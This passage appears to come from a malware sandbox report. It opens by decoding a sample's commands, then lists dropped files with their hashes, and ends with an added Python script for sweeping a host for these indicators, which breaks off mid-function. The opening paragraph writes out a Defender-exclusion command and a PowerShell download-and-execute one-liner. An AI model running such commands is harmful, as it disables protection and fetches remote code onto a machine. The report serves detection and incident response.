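Run stand-alone, it shows that PID 8980 adds a Defender process exclusion (`Add-MpPreference -ExclusionProcess AddInProcess.exe -Force`, cased to dodge naive string matches) and that PID 4028 reduces to `iex (curl -UseBasicParsing <url>)`, a download-and-execute chain. The `conhost.exe --headless` parent is a legitimate Windows flag for starting a child without a console window; using it as a proxy parent is what the "Process spawned unexpected child process" signature is reacting to, so a detection should key on the parent/child pair and the `-enc`/array-to-`[char]` patterns rather than on any single string.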

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Downloads

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                              Filesize

                                              649B

                                              MD5

                                              f5dcc8fcedacc29e0e58614d410a17df

                                              SHA1

                                              b4b107e17be7a8a75d1585d2dc3d488bb665075b

                                              SHA256

                                              67b2852bca887b7c89af6acc66edf4c637c4b0a42822e408165bcb0e0bb63c3c

                                              SHA512

                                              5fc99b53516ac98bbadf540485025632e89a1bfe101c1fd8a1a6bb3c19246bc4f0f8f3516df15afeda376098f406eedd97da3a3bd49ff28f8382c429835e19d4

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                              Filesize

                                              2B

                                              MD5

                                              d751713988987e9331980363e24189ce

                                              SHA1

                                              97d170e1550eee4afc0af065b78cda302a97674c

                                              SHA256

                                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                              SHA512

                                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                              Filesize

                                              80KB

                                              MD5

                                              2acd955b5553fb9563d7c2906155091c

                                              SHA1

                                              69a013e7c76663155ff4ef512e04de75e9bcaea4

                                              SHA256

                                              9df4d45ea537ecedd1ea42a662fe39d3343f7ac900993ffe098f4b0373694b1b

                                              SHA512

                                              0a0329258902a6410a51ed83790294b62a0ec969a9147e1e0e73ce71d7b3171fe668057cff1c900e3dc2b9ff3579f7d208d010a9cdb4436cbba029e04ceb31c1

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                              Filesize

                                              280B

                                              MD5

                                              690f9d619434781cadb75580a074a84d

                                              SHA1

                                              9c952a5597941ab800cae7262842ab6ac0b82ab1

                                              SHA256

                                              fc2e4954dbe6b72d5b09e1dc6360ea699437a2551355c2950da0b3d3a4779fc1

                                              SHA512

                                              d6b1da8e7febf926e8b6c316164efbbac22c7c3d9e4933a19fffba3d1667e1993cdeb5064aa53816c0c53f9d2c53e204772de987eb18adbb094a0fb84ae61fa9

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\43777905-94d9-469f-bdca-c5a9e2858271\index-dir\the-real-index

                                              Filesize

                                              1KB

                                              MD5

                                              b5c4629e33868448e5328e949e01d6bf

                                              SHA1

                                              d0addd774c45f4ae70608380de68789eff022c62

                                              SHA256

                                              1ea3e41426e71780633bd1557c640ac388317e7b7b24a8fc4c2e302166f75730

                                              SHA512

                                              865115835b6bde2a0c49d5606c2e9badaf47feec8f901d4b4f6cad37fea71c54946374174e3356b3af5470352d9726b4e297a8ec599d7688cb070feb8ef63ebf

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\43777905-94d9-469f-bdca-c5a9e2858271\index-dir\the-real-index~RFe57bd64.TMP

                                              Filesize

                                              1KB

                                              MD5

                                              9bc9b61101fd62bfbc91d46345e0536e

                                              SHA1

                                              5d2ac521af2a4a5416a0d3eb614834f2cf3ad5f4

                                              SHA256

                                              f668ff9286fb8a8a60cb706bb431e54e7b69148f900ed8d3643600c403083470

                                              SHA512

                                              1d0ad9b6fd68acf6c56626ea3eaabcd5ee6d700c7ca2b3f7a922bee843a95a26eb3fd01d0895c4f5bc45f0d53dc6c5789c280548ac5046ad26978fb2c8a4e922

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                              Filesize

                                              40KB

                                              MD5

                                              ed43715cc10877fe55ee113aba17187f

                                              SHA1

                                              05f9d782e4345dc791934bcad4efc32ba81b0491

                                              SHA256

                                              f04237211665743c4fd8444e7a0815d4c22e148891f8ccfd202bc43c60143c5c

                                              SHA512

                                              44cc1d73b1fa0cf1a587512d15314d0eb1a1b3976184649c9c16f543e90d51017a877d4d4c66caa8f88e5c0d05b3f3f236686ccac6a9c474b4f6df0f6b7af348

                                            • C:\Users\Admin\AppData\Local\Temp2E9SRRP3FEWN6MFS7BVJ6TWNI9VW5EYL.EXE

                                              Filesize

                                              2.0MB

                                              MD5

                                              63dfb36c0f5e23440ba4883aa4724e7c

                                              SHA1

                                              75c634d8c13392e377e0f5a6ebd13b55337e7b87

                                              SHA256

                                              d716f4c5b3f4e213aa10ab222d307fec44a1cab34f512807176a07cc412bf319

                                              SHA512

                                              fac6535f2e89c058f8564f7b09c3540f8afaf7f040e28391f3933fd58fd9ae7860a5e6d9b76dc1ee7dd0d5329aaf50d7ec06649d588d5496f3e137892fe61015

                                            • C:\Users\Admin\AppData\Local\Temp\10301560101\f76de72994.exe

                                              Filesize

                                              1.7MB

                                              MD5

                                              0d1c178fd56032549a557e63af5a158a

                                              SHA1

                                              374413f132e5f994eafb93d1e423709d1d6d40da

                                              SHA256

                                              cd624698fa0bb2fbc3680cf82a7c46aef413367c6bb4b11f794d2070fa712e22

                                              SHA512

                                              bc3273bd56d128cec9e159448dc18f44f1b904f5e7064b0de401164599630ff33ecb588819a7ca342ca18611a5f31f325eee2f4cea3f9a88d1145c821ce3a834

                                            • C:\Users\Admin\AppData\Local\Temp\10301570101\wjfOfXh.exe

                                              Filesize

                                              4.9MB

                                              MD5

                                              c909efcf6df1f5cab49d335588709324

                                              SHA1

                                              43ace2539e76dd0aebec2ce54d4b2caae6938cd9

                                              SHA256

                                              d749497d270374cba985b0b93c536684fc69d331a0725f69e2d3ff0e55b2fbc6

                                              SHA512

                                              68c95d27f47eeac10e8500cd8809582b771ab6b1c97a33d615d8edad997a6ab538c3c9fbb5af7b01ebe414ddaeaf28c0f1da88b80fbcb0305e27c1763f7c971a

                                            • C:\Users\Admin\AppData\Local\Temp\10301580101\OkH8IPF.exe

                                              Filesize

                                              1.1MB

                                              MD5

                                              b38cd06513a826e8976bb39c3e855f64

                                              SHA1

                                              79eef674168786ff0762cfdb88a9457f8b518ed5

                                              SHA256

                                              2e0b126dd788c027ca69b01335d4a08da28987c3c4296a3523d947da3c12cdc2

                                              SHA512

                                              6944ba859359f162e1fc5b2c2b14c7ab1fb9cf5c0a83d7d81d3de722344e8ae3efc300fe369a87d550645de93de4f02ed92c47718cce6fe834fdaa6b543730c9

                                            • C:\Users\Admin\AppData\Local\Temp\10301590101\weC48Q7.exe

                                              Filesize

                                              11.5MB

                                              MD5

                                              cc856b95bb94ebdeca5170a374122702

                                              SHA1

                                              2f1e0cfd433fc3d05ffd525ce4f756263e2772fc

                                              SHA256

                                              2351b77ceb3664e9045e797d2eb8a00300f795ea2ec99a81bc05156b6d695085

                                              SHA512

                                              006b849c4ad2fbd549bd00deaa42976a521c54ce254584b7696ac901c55a543548da069f3cfcc404f7827f73504d5d9f69315770de2ef0b8bd530f2e02bac37b

                                            • C:\Users\Admin\AppData\Local\Temp\10301600101\ARxx7NW.exe

                                              Filesize

                                              677KB

                                              MD5

                                              ff82cf635362a10afeca8beb04d22a5f

                                              SHA1

                                              89a88d6058bc52df34bab2fc3622ede8d0036840

                                              SHA256

                                              9a527eb9bd0239a1619632d2ca9d8a60096ad77986a430b1bad2f9e87f126c4a

                                              SHA512

                                              66e423011be69a12d5e74586311ea487215f1edf73199ac065abccf248e361e2c74ba18255c38d3724764a379ab84bdfee10e75665d848a9edfb1ef48373ffa8

                                            • C:\Users\Admin\AppData\Local\Temp\10301610101\tK0oYx3.exe

                                              Filesize

                                              1.1MB

                                              MD5

                                              292b5a2b7820688e131d541f18f48e84

                                              SHA1

                                              edb93c76c7edb5ebda65281f98fcc8e65ef3dbe5

                                              SHA256

                                              74c75de994a3d5033b78aa33774c8e85894869e12cd70376291dc0eb428fa7e8

                                              SHA512

                                              12d03a3cf95a10ab1555abe27f669f7073952d5d6a7ecadf739e3df4bf0e0712e1ae01e18ea9438eeb7cf3240965f4d86baef56871e11dfcf23cb9076014cf6e

                                            • C:\Users\Admin\AppData\Local\Temp\10301620101\d3jhg_003.exe

                                              Filesize

                                              1.3MB

                                              MD5

                                              5e9850567a55510d96b2c8844b536348

                                              SHA1

                                              afcf6d89d3a59fa3a261b54396ee65135d3177f0

                                              SHA256

                                              9f4190eb91c5241d0c41a77e1c12fe2dde01e67ef201b8032ada230333e2ae81

                                              SHA512

                                              7d8a03e39567a05e5945ca9e3401d31c302a2ff0448da4cd9804f62982a9247728552264e51dc8ce2390706874b4050e4598bdb2df076ef4407d9d31376d5fd9

                                            • C:\Users\Admin\AppData\Local\Temp\10301640101\zx4PJh6.exe

                                              Filesize

                                              1.4MB

                                              MD5

                                              06b18d1d3a9f8d167e22020aeb066873

                                              SHA1

                                              2fe47a3dbcbe589aa64cb19b6bbd4c209a47e5aa

                                              SHA256

                                              34b129b82df5d38841dc9978746790673f32273b07922c74326e0752a592a579

                                              SHA512

                                              e1f47a594337291cddff4b5febe979e5c3531bd81918590f25778c185d6862f8f7faa9f5e7a35f178edc1666d1846270293472de1fc0775abb8ae10e9bda8066

                                            • C:\Users\Admin\AppData\Local\Temp\10301650101\50KfF6O.exe

                                              Filesize

                                              3.2MB

                                              MD5

                                              9ec5cf784ec23ca09c2921668912cfeb

                                              SHA1

                                              4b9c8b0d197c359368164e5738b44a65fba40741

                                              SHA256

                                              56bd8367607b32bfe275478f96bbd0fe213c07eee696e0a268f817ea757a9543

                                              SHA512

                                              043d623ae8f3dbb43b504ba08d916f27f9054c4df46c6b5d0ae56e98c44b919e8d9a05e333c08adad286353bf5f6f1b75c1ee23f819462654c94e1542c31c464

                                            • C:\Users\Admin\AppData\Local\Temp\10301660101\k3t05Da.exe

                                              Filesize

                                              5.9MB

                                              MD5

                                              5cfc96efa07e34454e5a80a3c0202c98

                                              SHA1

                                              65804d32dc3694e8ec185051809a8342cf5d5d99

                                              SHA256

                                              fb0fe7e716caf3e0dcb1fbb6824466f807aa85295bfc7ed7046febf3331dab88

                                              SHA512

                                              1965ddab497907e3bf24f656f1085117c3f57c830e11c54068914df9d41de477eb6d23154ee0b7bd7781081aa7046390c9eccc2c80dbdfd3eb2693eef4ea1e01

                                            • C:\Users\Admin\AppData\Local\Temp\10301670101\XEh4XP0.exe

                                              Filesize

                                              409KB

                                              MD5

                                              7a21c185123189a5ae6ffd0cbadafe6b

                                              SHA1

                                              28497fa0240e640d924cdde590439cd42d0a6fb6

                                              SHA256

                                              09638a1b29e3c2c69409c533e7fc821dacb6c421d8d97e4954e6b620499fe680

                                              SHA512

                                              7e4988c029ff9cd9b7397250d318139507b68daacabce56b2783b901ce2f304381a20192bfc0199ecb0517f23806af76b9b01b725cc7b7bde992487dcf3dee0a

                                            • C:\Users\Admin\AppData\Local\Temp\10301690101\FdqlBTs.exe

                                              Filesize

                                              196KB

                                              MD5

                                              1b129d080655a4c9f703a5dce0195512

                                              SHA1

                                              9ec187c55fc3f50d98c372a96913fd38462c4ebf

                                              SHA256

                                              ee5c9b3dc922c0d16fd7a1e1d72c3530f9aee1209a233764f8280ee7dbc3b353

                                              SHA512

                                              09124bae1f5bf9df253b7551188e23b6ad29917c92ace51461987009606b88eedcc6a48f501307ef40127f5877f187549c93574e89435d393e7ae40555b98da5

                                            • C:\Users\Admin\AppData\Local\Temp\10301700101\659c4db84b.exe

                                              Filesize

                                              755KB

                                              MD5

                                              3d70f81f3e47ec786d33ea6643feb179

                                              SHA1

                                              5548c6faf961a5c851bfdfc492247bebef33a02e

                                              SHA256

                                              5a84f8015c00499d691df2724b50c08376d0ae4e62fc4e5abb1a3497ec3b438e

                                              SHA512

                                              522c284152d19c24420c67459d699e010313e3e56c93a4a17920d11ea40000d6337f8da589c7d14f5267de81b49489bfe70c944fb5576e08db0d4742f62130e0

                                            • C:\Users\Admin\AppData\Local\Temp\CGwmnCbOb.hta

                                              Filesize

                                              717B

                                              MD5

                                              9aeef7bdbf79dcf9ff7322be0c18c47d

                                              SHA1

                                              23ae5d5d4d765c0f22525e89a8e60c6c746b25fb

                                              SHA256

                                              7edca38357a3acfbc3dc9c40c86d615c4fdd680c300a6d2bb5163838fd1bc107

                                              SHA512

                                              6ebdca3ea6cba7532b526bd5a02ab95cfb2d3ce57f09f671f4906b998afba92efedc853979058379cdad240f708a4da9653bfe0d9a164eb2c6225ae541dfaa06

                                            • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\VCRUNTIME140_1.dll

                                              Filesize

                                              48KB

                                              MD5

                                              f8dfa78045620cf8a732e67d1b1eb53d

                                              SHA1

                                              ff9a604d8c99405bfdbbf4295825d3fcbc792704

                                              SHA256

                                              a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5

                                              SHA512

                                              ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

                                            • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd

                                              Filesize

                                              122KB

                                              MD5

                                              5377ab365c86bbcdd998580a79be28b4

                                              SHA1

                                              b0a6342df76c4da5b1e28a036025e274be322b35

                                              SHA256

                                              6c5f31bef3fdbff31beac0b1a477be880dda61346d859cf34ca93b9291594d93

                                              SHA512

                                              56f28d431093b9f08606d09b84a392de7ba390e66b7def469b84a21bfc648b2de3839b2eee4fb846bbf8bb6ba505f9d720ccb6bb1a723e78e8e8b59ab940ac26

                                            • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_lzma.pyd

                                              Filesize

                                              156KB

                                              MD5

                                              9e94fac072a14ca9ed3f20292169e5b2

                                              SHA1

                                              1eeac19715ea32a65641d82a380b9fa624e3cf0d

                                              SHA256

                                              a46189c5bd0302029847fed934f481835cb8d06470ea3d6b97ada7d325218a9f

                                              SHA512

                                              b7b3d0f737dd3b88794f75a8a6614c6fb6b1a64398c6330a52a2680caf7e558038470f6f3fc024ce691f6f51a852c05f7f431ac2687f4525683ff09132a0decb

                                            • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

                                              Filesize

                                              81KB

                                              MD5

                                              69801d1a0809c52db984602ca2653541

                                              SHA1

                                              0f6e77086f049a7c12880829de051dcbe3d66764

                                              SHA256

                                              67aca001d36f2fce6d88dbf46863f60c0b291395b6777c22b642198f98184ba3

                                              SHA512

                                              5fce77dd567c046feb5a13baf55fdd8112798818d852dfecc752dac87680ce0b89edfbfbdab32404cf471b70453a33f33488d3104cd82f4e0b94290e83eae7bb

                                            • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ssl.pyd

                                              Filesize

                                              174KB

                                              MD5

                                              90f080c53a2b7e23a5efd5fd3806f352

                                              SHA1

                                              e3b339533bc906688b4d885bdc29626fbb9df2fe

                                              SHA256

                                              fa5e6fe9545f83704f78316e27446a0026fbebb9c0c3c63faed73a12d89784d4

                                              SHA512

                                              4b9b8899052c1e34675985088d39fe7c95bfd1bbce6fd5cbac8b1e61eda2fbb253eef21f8a5362ea624e8b1696f1e46c366835025aabcb7aa66c1e6709aab58a

                                            • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem

                                              Filesize

                                              292KB

                                              MD5

                                              50ea156b773e8803f6c1fe712f746cba

                                              SHA1

                                              2c68212e96605210eddf740291862bdf59398aef

                                              SHA256

                                              94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47

                                              SHA512

                                              01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0

                                            • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\unicodedata.pyd

                                              Filesize

                                              1.1MB

                                              MD5

                                              a8ed52a66731e78b89d3c6c6889c485d

                                              SHA1

                                              781e5275695ace4a5c3ad4f2874b5e375b521638

                                              SHA256

                                              bf669344d1b1c607d10304be47d2a2fb572e043109181e2c5c1038485af0c3d7

                                              SHA512

                                              1c131911f120a4287ebf596c52de047309e3be6d99bc18555bd309a27e057cc895a018376aa134df1dc13569f47c97c1a6e8872acedfa06930bbf2b175af9017

                                            • C:\Users\Admin\AppData\Local\Temp\Spare.wmv.bat

                                              Filesize

                                              24KB

                                              MD5

                                              237136e22237a90f7393a7e36092ebbe

                                              SHA1

                                              fb9a31d2fe60dcad2a2d15b08f445f3bd9282d5f

                                              SHA256

                                              89d7a9aaad61abc813af7e22c9835b923e5af30647f772c5d4a0f6168ed5001f

                                              SHA512

                                              822de2d86b6d1f7b952ef67d031028835604969d14a76fc64af3ea15241fdb11e3e014ddd2cd8048b8fc01a416ca1f7ccc54755cb4416d14bbdfe8680e43bd41

                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3iai4the.2sc.ps1

                                              Filesize

                                              60B

                                              MD5

                                              d17fe0a3f47be24a6453e9ef58c94641

                                              SHA1

                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                              SHA256

                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                              SHA512

                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

• C:\Users\Admin\AppData\Local\Temp\ebc59c84-1d9c-4057-ae09-0c701210a265\AgileDotNetRT.dll
  Filesize: 2.3MB
  MD5: 5f449db8083ca4060253a0b4f40ff8ae
  SHA1: 2b77b8c86fda7cd13d133c93370ff302cd08674b
  SHA256: 7df49cba50cc184b0fbb31349bd9f2b18acf5f7e7fac9670759efa48564eaef1
  SHA512: 4ce668cf2391422ef37963a5fd6c6251d414f63545efb3f1facb77e4695cd5a8af347bd77fc2bebfa7fd3ef10ff413a7acfde32957037a51c59806577351825f

• C:\Users\Admin\AppData\Local\Temp\onefile_2984_133871351856401133\VCRUNTIME140.dll
  Filesize: 116KB
  MD5: be8dbe2dc77ebe7f88f910c61aec691a
  SHA1: a19f08bb2b1c1de5bb61daf9f2304531321e0e40
  SHA256: 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
  SHA512: 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

• C:\Users\Admin\AppData\Local\Temp\onefile_2984_133871351856401133\_bz2.pyd
  Filesize: 83KB
  MD5: 30f396f8411274f15ac85b14b7b3cd3d
  SHA1: d3921f39e193d89aa93c2677cbfb47bc1ede949c
  SHA256: cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f
  SHA512: 7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f

• C:\Users\Admin\AppData\Local\Temp\onefile_2984_133871351856401133\_hashlib.pyd
  Filesize: 64KB
  MD5: a25bc2b21b555293554d7f611eaa75ea
  SHA1: a0dfd4fcfae5b94d4471357f60569b0c18b30c17
  SHA256: 43acecdc00dd5f9a19b48ff251106c63c975c732b9a2a7b91714642f76be074d
  SHA512: b39767c2757c65500fc4f4289cb3825333d43cb659e3b95af4347bd2a277a7f25d18359cedbdde9a020c7ab57b736548c739909867ce9de1dbd3f638f4737dc5

• C:\Users\Admin\AppData\Local\Temp\onefile_2984_133871351856401133\_queue.pyd
  Filesize: 31KB
  MD5: e1c6ff3c48d1ca755fb8a2ba700243b2
  SHA1: 2f2d4c0f429b8a7144d65b179beab2d760396bfb
  SHA256: 0a6acfd24dfbaa777460c6d003f71af473d5415607807973a382512f77d075fa
  SHA512: 55bfd1a848f2a70a7a55626fb84086689f867a79f09726c825522d8530f4e83708eb7caa7f7869155d3ae48f3b6aa583b556f3971a2f3412626ae76680e83ca1

• C:\Users\Admin\AppData\Local\Temp\onefile_2984_133871351856401133\_wmi.pyd
  Filesize: 36KB
  MD5: 827615eee937880862e2f26548b91e83
  SHA1: 186346b816a9de1ba69e51042faf36f47d768b6c
  SHA256: 73b7ee3156ef63d6eb7df9900ef3d200a276df61a70d08bd96f5906c39a3ac32
  SHA512: 45114caf2b4a7678e6b1e64d84b118fb3437232b4c0add345ddb6fbda87cebd7b5adad11899bdcd95ddfe83fdc3944a93674ca3d1b5f643a2963fbe709e44fb8

• C:\Users\Admin\AppData\Local\Temp\onefile_2984_133871351856401133\charset_normalizer\md.pyd
  Filesize: 10KB
  MD5: 71d96f1dbfcd6f767d81f8254e572751
  SHA1: e70b74430500ed5117547e0cd339d6e6f4613503
  SHA256: 611e1b4b9ed6788640f550771744d83e404432830bb8e3063f0b8ec3b98911af
  SHA512: 7b10e13b3723db0e826b7c7a52090de999626d5fa6c8f9b4630fdeef515a58c40660fa90589532a6d4377f003b3cb5b9851e276a0b3c83b9709e28e6a66a1d32

• C:\Users\Admin\AppData\Local\Temp\onefile_2984_133871351856401133\charset_normalizer\md__mypyc.pyd
  Filesize: 122KB
  MD5: d8f690eae02332a6898e9c8b983c56dd
  SHA1: 112c1fe25e0d948f767e02f291801c0e4ae592f0
  SHA256: c6bb8cad80b8d7847c52931f11d73ba64f78615218398b2c058f9b218ff21ca9
  SHA512: e732f79f39ba9721cc59dbe8c4785ffd74df84ca00d13d72afa3f96b97b8c7adf4ea9344d79ee2a1c77d58ef28d3ddcc855f3cb13edda928c17b1158abcc5b4a

• C:\Users\Admin\AppData\Local\Temp\onefile_2984_133871351856401133\libcrypto-3.dll
  Filesize: 5.0MB
  MD5: 123ad0908c76ccba4789c084f7a6b8d0
  SHA1: 86de58289c8200ed8c1fc51d5f00e38e32c1aad5
  SHA256: 4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43
  SHA512: 80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04

• C:\Users\Admin\AppData\Local\Temp\onefile_2984_133871351856401133\libssl-3.dll
  Filesize: 774KB
  MD5: 4ff168aaa6a1d68e7957175c8513f3a2
  SHA1: 782f886709febc8c7cebcec4d92c66c4d5dbcf57
  SHA256: 2e4d35b681a172d3298caf7dc670451be7a8ba27c26446efc67470742497a950
  SHA512: c372b759b8c7817f2cbb78eccc5a42fa80bdd8d549965bd925a97c3eebdce0335fbfec3995430064dead0f4db68ebb0134eb686a0be195630c49f84b468113e3

• C:\Users\Admin\AppData\Local\Temp\onefile_2984_133871351856401133\python312.dll
  Filesize: 6.6MB
  MD5: 166cc2f997cba5fc011820e6b46e8ea7
  SHA1: d6179213afea084f02566ea190202c752286ca1f
  SHA256: c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546
  SHA512: 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

• C:\Users\Admin\AppData\Local\Temp\onefile_2984_133871351856401133\select.pyd
  Filesize: 30KB
  MD5: 7c14c7bc02e47d5c8158383cb7e14124
  SHA1: 5ee9e5968e7b5ce9e4c53a303dac9fc8faf98df3
  SHA256: 00bd8bb6dec8c291ec14c8ddfb2209d85f96db02c7a3c39903803384ff3a65e5
  SHA512: af70cbdd882b923013cb47545633b1147ce45c547b8202d7555043cfa77c1deee8a51a2bc5f93db4e3b9cbf7818f625ca8e3b367bffc534e26d35f475351a77c

• C:\Users\Admin\AppData\Local\Temp\onefile_2984_133871351856401133\windowscore.exe
  Filesize: 22.0MB
  MD5: 35c2d9b6047fedc6b4834f3d0e7911f1
  SHA1: c930eae357b90841f330aa87ff3c7b665232d303
  SHA256: a0175ab162ba9bc6a67eee3136244838d1cbe53b76e37122c169b69208498f99
  SHA512: db453be569d22ea225dd5c1d4cc65a7b8dffb65aff87ddd135271df4472e659c1151139330641d71c48b916a110df1080fe6c74b04657f8450c8b8422ecb0a55

• C:\Users\Admin\AppData\Local\Temp\onefile_2984_133871351856401133\zstandard\backend_c.pyd
  Filesize: 508KB
  MD5: 0fc69d380fadbd787403e03a1539a24a
  SHA1: 77f067f6d50f1ec97dfed6fae31a9b801632ef17
  SHA256: 641e0b0fa75764812fff544c174f7c4838b57f6272eaae246eb7c483a0a35afc
  SHA512: e63e200baf817717bdcde53ad664296a448123ffd055d477050b8c7efcab8e4403d525ea3c8181a609c00313f7b390edbb754f0a9278232ade7cfb685270aaf0

• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tetras.bat
  Filesize: 229KB
  MD5: a88ec7e95bc60df9126e9b22404517ac
  SHA1: aca6099018834d01dc2d0f6003256ecdd3582d52
  SHA256: 9c256303330feb957a162d5093e7b3090d7a43f7d8818f4e33b953b319b8084e
  SHA512: a1b7b57926c9365c8b4615e9c27017e7f850e918e559f81407177f3e748376b95aa3b6f72b71933922b10664d0383e2137aafff0cae3f14ab5dfbf770bacb7bc

• C:\Users\Admin\AppData\Roaming\media\svchost.exe
  Filesize: 2.0MB
  MD5: afe87afeb5b339f42dfb9b1f2128dfa8
  SHA1: e850e154a51f9625d0429690b1b2c9f3c723b42c
  SHA256: 42d33278d9c7b2cafc21199aec5788652403aa94f72515b2854dce75e420b27c
  SHA512: 99f509e2cfab5ae3679b831b70cb64127e727d4477d2f99b7ffe636d1f1dbc5a86e091243f714856fe8707ff6878f465ec63da982e0ead4fcd3a55c6c04d78f0
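
The dropped-file entries above are the host indicators an incident responder takes away from this report: a hash set plus the paths the sample writes to, including a Startup-folder .bat and a svchost.exe under a non-system directory. The Python below is an added example, not part of the sandbox report or of any tool it names. It parses entries written in this report's layout (label on one line, value after a blank line, or the compact "Label: value" form) into records, then sweeps a directory tree, matching first on SHA256 and, as a weaker signal that survives a rebuilt sample, on the same parent directory plus file name. The SAMPLE_REPORT text is constructed from two of the entries on this page; the sweep root is whatever the caller passes on the command line.

```python
"""Added example (not part of the sandbox report): parse a dropped-files listing
into host IOCs and sweep a directory tree for them.  Python 3.8+, stdlib only."""
import hashlib
import os
import re
import sys
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample text: two file entries copied from the report (the first in
# the page's flattened label/blank/value layout, the second as 'Label: value'),
# plus one memory-dump entry, which has no hashes and must be skipped.
SAMPLE_REPORT = (
    "\u2022 C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\tetras.bat\n\n"
    "  Filesize\n\n  229KB\n\n  MD5\n\n  a88ec7e95bc60df9126e9b22404517ac\n\n"
    "  SHA1\n\n  aca6099018834d01dc2d0f6003256ecdd3582d52\n\n"
    "  SHA256\n\n  9c256303330feb957a162d5093e7b3090d7a43f7d8818f4e33b953b319b8084e\n\n"
    "  SHA512\n\n  a1b7b57926c9365c8b4615e9c27017e7f850e918e559f81407177f3e748376b9"
    "5aa3b6f72b71933922b10664d0383e2137aafff0cae3f14ab5dfbf770bacb7bc\n\n"
    "\u2022 C:\\Users\\Admin\\AppData\\Roaming\\media\\svchost.exe\n"
    "  Filesize: 2.0MB\n  MD5: afe87afeb5b339f42dfb9b1f2128dfa8\n"
    "  SHA1: e850e154a51f9625d0429690b1b2c9f3c723b42c\n"
    "  SHA256: 42d33278d9c7b2cafc21199aec5788652403aa94f72515b2854dce75e420b27c\n"
    "  SHA512: 99f509e2cfab5ae3679b831b70cb64127e727d4477d2f99b7ffe636d1f1dbc5a"
    "86e091243f714856fe8707ff6878f465ec63da982e0ead4fcd3a55c6c04d78f0\n"
    "\u2022 memory/2540-36183-0x0000000000400000-0x000000000040E000-memory.dmp\n"
    "  Filesize: 56KB\n"
)

# A label, an optional colon, any whitespace (including the blank line), then the value.
FIELD_RE = re.compile(r"\b(Filesize|MD5|SHA1|SHA256|SHA512)\s*:?\s*(\S+)")
LABEL_RE = re.compile(r"^(Filesize|MD5|SHA1|SHA256|SHA512)\b")


@dataclass(frozen=True)
class DroppedFile:
    path: Optional[str]  # None when the entry's path line is missing (cut-off entry)
    size: str
    md5: str
    sha1: str
    sha256: str
    sha512: str


def parse_dropped_files(text: str) -> List[DroppedFile]:
    """One record per bullet that carries a SHA256; memory dumps have none and are skipped."""
    records = []
    for chunk in re.split(r"^\s*\u2022\s*", text, flags=re.M):
        lines = [ln.strip() for ln in chunk.splitlines() if ln.strip()]
        if not lines:
            continue
        fields = {k.lower(): v for k, v in FIELD_RE.findall(chunk)}
        if "sha256" not in fields:
            continue
        path = None if LABEL_RE.match(lines[0]) else lines[0]
        records.append(DroppedFile(path, fields.get("filesize", ""), fields.get("md5", ""),
                                   fields.get("sha1", ""), fields["sha256"], fields.get("sha512", "")))
    return records


def hash_file(path: str, block: int = 1 << 20) -> Dict[str, str]:
    """All four digests in a single pass, so a large file is read from disk once."""
    hashers = {"md5": hashlib.md5(), "sha1": hashlib.sha1(), "sha256": hashlib.sha256(), "sha512": hashlib.sha512()}
    with open(path, "rb") as fh:
        for data in iter(lambda: fh.read(block), b""):
            for h in hashers.values():
                h.update(data)
    return {name: h.hexdigest() for name, h in hashers.items()}


def location_tail(path: str, n: int = 2) -> Tuple[str, ...]:
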